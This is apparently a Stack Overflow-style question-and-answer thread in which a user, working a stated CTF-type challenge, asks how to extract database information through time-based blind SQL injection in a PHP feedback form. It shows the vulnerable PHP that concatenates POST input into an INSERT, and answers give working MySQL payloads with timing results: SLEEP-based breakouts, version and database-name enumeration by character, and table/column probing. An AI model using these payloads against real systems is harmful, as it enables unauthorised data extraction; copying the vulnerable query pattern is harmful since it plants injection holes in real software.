# Finding sql-query for time-based blind sqlinjection

Tags: mysql, database, sql-injection, penetration-testing

I have simple web application that allows to post a message to a MySQL database.
My challenge is to get all the information about that Database.
Unfortunately there's no output so I have to do a time-based blind injection.

This payload works and the response takes 5 seconds to reach the client.

```
' RLIKE SLEEP(5) AND '1'='1
```

I have to somehow replace the `'1'='1` so I can check for table names or users.

Any idea??

Following is the code with the vulnerable query.

```
<?php
if (isset($_POST['feedback'])) {
    $id = $_POST['feedback'];
    $query = "INSERT INTO `hackdb`.`feedback` (`id` ,`feedback`, `feedback_read`, `created` ,`receiver`) VALUES (NULL,'".$_POST['feedback']."', '0', CURRENT_TIMESTAMP, '17')";
    if ($result = $mysqli->query($query)) {
        //echo "Done";  
    } else {
        //echo $mysqli->error;
    }
    echo "Thank you for your feedback! We'll contact you later.";
} else {
    echo "";
}
?>
```

(Disclaimer: This is a challenge and I'm working on a private server inside a VM. Nothing unethical is going on here)

Comment: I hope you understand that "nothing unethical is going on here" is just what a criminal hacker would say... :-)

Comment: What is your web application written in?

Comment: here's a suggestion... replace this part of the payload `'1'='1` with something that causes an error when the statement is parsed/prepared, that is, before the SLEEP(5) would get executed. if we reference an identifier (a table name or column name that we don't have privileges on or doesn't exist), the query will fail during semantic check.. e.g. replace `'1' = '1` with `EXISTS (SELECT 1 FROM sometable) AND '1'='1`. If `sometable` isn't a valid table or view, the query will error during prepare, before the SLEEP(5) will ever get executed. When we supply a valid tablename...

Comment: If it's a challenge, aren't you supposed to do it yourself?

Comment: @SEarle1986 php

Comment: Please show some code where the vulnerable query is

Comment: @YourCommonSense any coding program can be considered a challenge. Every question on StackOverflow is supposed to be done "yourself". What's your point?

Comment: @RaymondNijland added the code to the question

Comment: @spencer7593 like this?
`' RLIKE SLEEP(5) AND EXISTS (SELECT 1 FROM feedback) AND '1'='1`
doesn't work for me

Comment: @MichaelPomogajko i've posted a answer with some basic examples on how to attack this vulnerable insert query

Comment: If the injection isn't in the context of a `SELECT`  (the edit to the question shows that this is in the context of an INSERT statement), then we'd need to include a full `SELECT` in the payload in order to make use of `EXISTS`. And to elicit information about the database (which tables and columns exist) we are going to need to use a SELECT.

Comment: @spencer7593 any idea on how I can integrate a select into the query?

Answer (score 1, accepted):

Looking into your code only the field feedback is vulnerable to timebased blind SQL injection vectors.

**Create database/create table**

```
CREATE DATABASE IF NOT EXISTS hackdb;

CREATE TABLE IF NOT EXISTS feedback (
  feedback VARCHAR(255)
);
```

You can inject using `(SELECT ...)` into feedback column because this is valid SQL.

**Query**

```
INSERT INTO
  hackdb.feedback
(feedback)
VALUES (
 (SELECT 1)
)
```

**Result**

```
1 row(s) affected

Execution Time : 0.013 sec
Transfer Time  : 0 sec
Total Time     : 0.014 sec
```

Test the timebased blind SQL injection vector.

**Query**

```
INSERT INTO
  hackdb.feedback
(feedback)
VALUES (
 (SELECT SLEEP(5))
)
```

**Result**

```
1 row(s) affected

Execution Time : 5.717 sec
Transfer Time  : 0 sec
Total Time     : 5.718 sec
```

And we are good to go.
Let's find out the database version. 
We can use MySQL's VERSION() function for that

**Query**

```
INSERT INTO
  hackdb.feedback
(feedback)
VALUES (
 (SELECT 
   CASE
     WHEN VERSION() LIKE '5.1%'
     THEN SLEEP(5)
    ELSE 0
   END
  FROM 
  DUAL 
 )
)
```

**Result**

```
1 row(s) affected

Execution Time : 0.014 sec
Transfer Time  : 0 sec
Total Time     : 0.014 sec
```

**No bingo**

**Query**

```
INSERT INTO
  hackdb.feedback
(feedback)
VALUES (
 (SELECT 
   CASE
     WHEN VERSION() LIKE '5.7%'
     THEN SLEEP(5)
    ELSE 0
   END
  FROM 
  DUAL 
 )
)
```

**Result**

```
1 row(s) affected

Execution Time : 5.733 sec
Transfer Time  : 0 sec
Total Time     : 5.734 sec
```

**Bingo.**

Now we are going to find the database in use. 
We can use MySQL's DATABASE() function for that.

**Query**

```
INSERT INTO
  hackdb.feedback
(feedback)
VALUES (
 (SELECT 
   CASE
    WHEN (SELECT 1 FROM DUAL WHERE DATABASE() LIKE 's%')
    THEN SLEEP(5)
    ELSE 0
   END
  FROM 
 DUAL
 )
)
```

**Result**

```
1 row(s) affected

Execution Time : 0.014 sec
Transfer Time  : 0 sec
Total Time     : 0.015 sec
```

**No bingo**

**Query**

```
INSERT INTO
  hackdb.feedback
(feedback)
VALUES (
 (SELECT 
   CASE
    WHEN (SELECT 1 FROM DUAL WHERE DATABASE() LIKE 'h%')
    THEN SLEEP(5)
    ELSE 0
   END
  FROM 
 DUAL
 )
)
```

**Result**

```
1 row(s) affected

Execution Time : 5.715 sec
Transfer Time  : 0 sec
Total Time     : 5.716 sec
```

**Bingo**

Now you can add a second char into the LIKE part and so on.

I have given you some basic timebased blind SQL injection vectors. 
It's up to you to find the tables in the database 
I don't want to spoil your complete challenge.

Comment: Thanks, I get the concept now. But the thing is that I can't use the selects like you recommended it. I need to break out of the query first and I did it with `' RLIKE SLEEP(5) AND '1'='1`
I tried to insert the selects there but it didn't work for me

Comment: @MichaelPomogajko indeed you need to break out off the qoutes i missed that back to the drawing board.. give me a moment i might think off something

Comment: @MichaelPomogajko yes i know the answer already you can make use of operators like + - * / like this `VALUES ('' + (SELECT SLEEP(5)) )` then mine timebased blind SQL injections should work... So the injection string is `' + (SELECT SLEEP(5))`

Answer (score 0):

table and insert for demonstrating possible payloads

```
CREATE TABLE foo_test
(id BIGINT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY
, blah VARCHAR(100)
) ;

INSERT INTO foo_test (id,blah) VALUES (NULL,'payload') ;
```

Some demonstration replacements for `payload`

**invalid table/view name - gets quick response**

payload=  **`1' AND (SELECT 1 FROM feedback WHERE 0=1) AND SLEEP(5) AND '1`** 

Execution Time : 0 sec

Error Code: 1146

Table 'test.feedback' doesn't exist

**good table name - 5+ seconds**

payload=  **`1' AND (SELECT 1 FROM foo WHERE 0=1) AND SLEEP(5) AND '1`**

Execution Time : 5.198 sec

1 row(s) affected

**bad column name - quick response**

payload=  **`1' AND (SELECT bar FROM foo WHERE 0=1) AND SLEEP(5) AND '1`**

Execution Time : 0 sec

Error Code: 1054

Unknown column 'bar' in 'field list'